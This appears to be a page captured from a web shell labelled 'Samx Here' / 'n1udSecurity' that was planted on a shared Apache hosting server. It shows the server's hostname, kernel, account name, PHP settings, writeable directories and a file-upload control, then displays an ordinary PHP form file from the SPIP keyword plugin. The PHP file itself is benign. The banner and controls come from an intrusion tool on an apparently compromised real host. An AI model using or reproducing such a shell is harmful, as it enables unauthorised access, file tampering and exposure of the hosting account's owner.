Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/jobs/plugins-dist/mots/formulaires/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/jobs/plugins-dist/mots/formulaires/administrer_mot.php
<?php

if (!defined('_ECRIRE_INC_VERSION')) { return;
}

function formulaires_administrer_mot_charger_dist($id_mot) {
	$valeurs = [
		'associer_objets_mot' => '',
		'dissocier_objets_mot' => '',
		'fusionner_mot' => '',
		'associer_objets_mot_id' => '',
		'dissocier_objets_mot_id' => '',
		'fusionner_mot_id' => '',
		'revert_action' => '',
	];

	return $valeurs;
}

function afficher_options_mots($id_selected) {
	static $options;
	if (is_null($options)) {
		// d'abord les count en 1 coup
		$counts = sql_allfetsel('id_mot, count(id_objet) as n', 'spip_mots_liens', '', 'id_mot', 'id_mot');
		$counts = array_column($counts, 'n', 'id_mot');

		// puis les groupes
		$groupes = sql_allfetsel('*', 'spip_groupes_mots', '', '', '0+ titre, titre');
		foreach ($groupes as $groupe) {
			$options['groupeopen-' . $groupe['id_groupe']] = '<optgroup label="' . attribut_html(typo(supprimer_numero($groupe['titre']))) . '">';
			$res = sql_select('id_mot, titre', 'spip_mots', 'id_groupe=' . intval($groupe['id_groupe']), '', '0+ titre, titre');
			while ($row = sql_fetch($res)) {
				$id_mot = $row['id_mot'];
				if (isset($counts[$id_mot]) and $n = $counts[$id_mot]) {
					$options[$id_mot] = '<option value="' . $id_mot . '">' . typo(supprimer_numero($row['titre'])) . " ($n)</option>";
				}
			}
			$options['groupeclose-' . $groupe['id_groupe']] = '</optgroup>';
		}
	}
	if ($id_selected and isset($options[$id_selected])) {
		$options[$id_selected] = inserer_attribut($options[$id_selected], 'selected', 'selected');
	}
	$s = implode("\n", $options);
	if ($id_selected and isset($options[$id_selected])) {
		$options[$id_selected] = vider_attribut($options[$id_selected], 'selected');
	}
	return $s;
}


function formulaires_administrer_mot_verifier_dist($id_mot) {

	$erreurs = [];

	$check = '';
	if (_request('associer')) {
		$check = 'associer_objets_mot';
	}
	elseif (_request('dissocier')) {
		$check = 'dissocier_objets_mot';
	}
	elseif (_request('fusionner')) {
		$check = 'fusionner_mot';
	}

	if (!$check and (!_request('revert') or !_request('revert_action'))) {
		$erreurs['message_erreur'] = _T('adminmots:erreur_admin_mot_action_inconnue');
	}
	elseif ($check) {
		$id = admot_recupere_id_mot($check);
		if (!$id) {
			$erreurs[$check] = _T('adminmots:erreur_selection_id');
		}
		elseif ($id == $id_mot) {
			$erreurs[$check] = _T('adminmots:erreur_mot_cle_deja');
		}
		elseif ($check == 'fusionner_mot' and !_request('confirm_fusionner_mot')) {
			$counts = sql_allfetsel('objet,count(id_objet) as N', 'spip_mots_liens', 'id_mot=' . intval($id_mot), 'objet');
			$detail = [];
			foreach ($counts as $count) {
				$detail [] = objet_afficher_nb($count['N'], $count['objet']);
			}
			$detail = implode(', ', $detail);
			if (!isset($erreurs['message_erreur'])) {
				$erreurs['message_erreur'] = '';
			}
			$erreurs[$check] =
			  _T('adminmots:label_confirm_fusion', ['id_mot' => $id_mot,'id_mot_new' => $id])
			  . " <b>$detail</b>" . "<br />\n"
			  . "<input type='checkbox' name='confirm_fusionner_mot' value='1' id='confirm_fusionner_mot' /> "
			  . "<label for='confirm_fusionner_mot'>"
			  . _T('adminmots:label_confirm_fusion_check', ['id_mot' => $id_mot,'id_mot_new' => $id])
			  . '</label>';
		}
	}

	return $erreurs;
}

function admot_recupere_id_mot($name) {
	if (!$id_mot = intval(_request($name . '_id'))) {
		$id_mot = intval(_request($name));
	}

	return $id_mot;
}

function admot_associer_objets_mot($id_mot, $objet, $ids) {
	if (is_countable($ids) ? count($ids) : 0) {
		$couples = [];
		foreach ($ids as $id) {
			$couples[] = [
				'id_mot' => $id_mot,
				'id_objet' => $id,
				'objet' => $objet
			];
		}
		return sql_insertq_multi('spip_mots_liens', $couples);
	}
	return false;
}

function admot_dissocier_objets_mot($id_mot, $objet, $ids) {
	if (is_countable($ids) ? count($ids) : 0) {
		return sql_delete('spip_mots_liens', 'id_mot=' . intval($id_mot) . ' AND objet=' . sql_quote($objet) . ' AND ' . sql_in('id_objet', $ids));
	}
	return false;
}


function formulaires_administrer_mot_traiter_dist($id_mot) {

	$res = [];
	refuser_traiter_formulaire_ajax();
	if (_request('revert')) {
		$action = _request('revert_action');
		$action = explode('/', $action);
		$quoi = array_shift($action);
		foreach ($action as $a) {
			[$objet, $ids] = explode(':', $a);
			$ids = explode(',', $ids);
			if ($objet and $ids) {
				if ($quoi == 'add') {
					admot_associer_objets_mot($id_mot, $objet, $ids);
				}
				if ($quoi == 'del') {
					admot_dissocier_objets_mot($id_mot, $objet, $ids);
				}
			}
		}
		$res['message_ok'] = _T('adminmots:result_cancel_ok');
		set_request('revert_action', '');
	}
	else {
		$check = '';
		if (_request('associer')) {
			$check = 'associer_objets_mot';
		}
		elseif (_request('dissocier')) {
			$check = 'dissocier_objets_mot';
		}
		elseif (_request('fusionner')) {
			$check = 'fusionner_mot';
		}
		$id = admot_recupere_id_mot($check);

		$revert = [];
		$res = [];
		// associer
		if ($check == 'associer_objets_mot') {
			$revert = [];
			$message = [];
			$objets = sql_allfetsel('distinct objet', 'spip_mots_liens', 'id_mot=' . intval($id), '', 'objet');
			$objets = array_column($objets, 'objet');
			foreach ($objets as $objet) {
				$all = sql_allfetsel('id_objet', 'spip_mots_liens', 'id_mot=' . intval($id) . ' AND objet=' . sql_quote($objet));
				$all = array_column($all, 'id_objet');
				$deja = sql_allfetsel('id_objet', 'spip_mots_liens', 'id_mot=' . intval($id_mot) . ' AND objet=' . sql_quote($objet) . ' AND ' . sql_in('id_objet', $all));
				$deja = array_column($deja, 'id_objet');
				$add = array_diff($all, $deja);
				if (count($add)) {
					$revert[] = "$objet:" . implode(',', $add);
					admot_associer_objets_mot($id_mot, $objet, $add);
					$message[] = objet_afficher_nb(count($add), $objet);
				}
			}
			if (count($message)) {
				$revert = 'del/' . implode('/', $revert);
				$message = implode(', ', $message);
				$res['message_ok'] = $message . _T('adminmots:result_associer_nb');
			}
			else {
				$res['message_ok'] = _T('adminmots:result_associer_ras');
			}
		}
		// dissocier
		if ($check == 'dissocier_objets_mot') {
			$revert = [];
			$message = [];
			$objets = sql_allfetsel('distinct objet', 'spip_mots_liens', 'id_mot=' . intval($id), '', 'objet');
			$objets = array_column($objets, 'objet');
			foreach ($objets as $objet) {
				$all = sql_allfetsel('id_objet', 'spip_mots_liens', 'id_mot=' . intval($id) . ' AND objet=' . sql_quote($objet));
				$all = array_column($all, 'id_objet');
				$has = sql_allfetsel('id_objet', 'spip_mots_liens', 'id_mot=' . intval($id_mot) . ' AND objet=' . sql_quote($objet) . ' AND ' . sql_in('id_objet', $all));
				$has = array_column($has, 'id_objet');
				if (count($has)) {
					$revert[] = "$objet:" . implode(',', $has);
					admot_dissocier_objets_mot($id_mot, $objet, $has);
					$message[] = objet_afficher_nb(count($has), $objet);
				}
			}
			if (count($message)) {
				$revert = 'add/' . implode('/', $revert);
				$message = implode(', ', $message);
				$res['message_ok'] = $message . _T('adminmots:result_dissocier_nb');
			}
			else {
				$res['message_ok'] = _T('adminmots:result_dissocier_ras');
			}
		}

		// fusionner
		if ($check == 'fusionner_mot') {
			$all = sql_allfetsel('id_objet,objet,id_mot', 'spip_mots_liens', 'id_mot=' . intval($id_mot));
			$mot = sql_fetsel('*', 'spip_mots', 'id_mot=' . intval($id_mot));
			$dump = var_export($mot, true) . "\n\n" . var_export($all, true);
			ecrire_fichier(_DIR_LOG . "fusion_mot_{$id_mot}_vers_{$id}_" . date('Y-m-d-His') . '.dump', $dump);
			foreach ($all as $a) {
				$a['id_mot'] = $id;
				sql_insertq('spip_mots_liens', $a);
			}
			sql_delete('spip_mots_liens', 'id_mot=' . $id_mot);
			$link = "<a href='" . generer_objet_url($id, 'mot') . "'>" . objet_info('mot', 'texte_objet') . " #$id</a>";
			$res['message_ok'] = _T('adminmots:result_fusionner_ok', ['mot' => $link]);
		}

		if ($revert) {
			set_request('revert_action', $revert);
		}
	}
	set_request('administrer', 'oui');

	return $res;
}

SAMX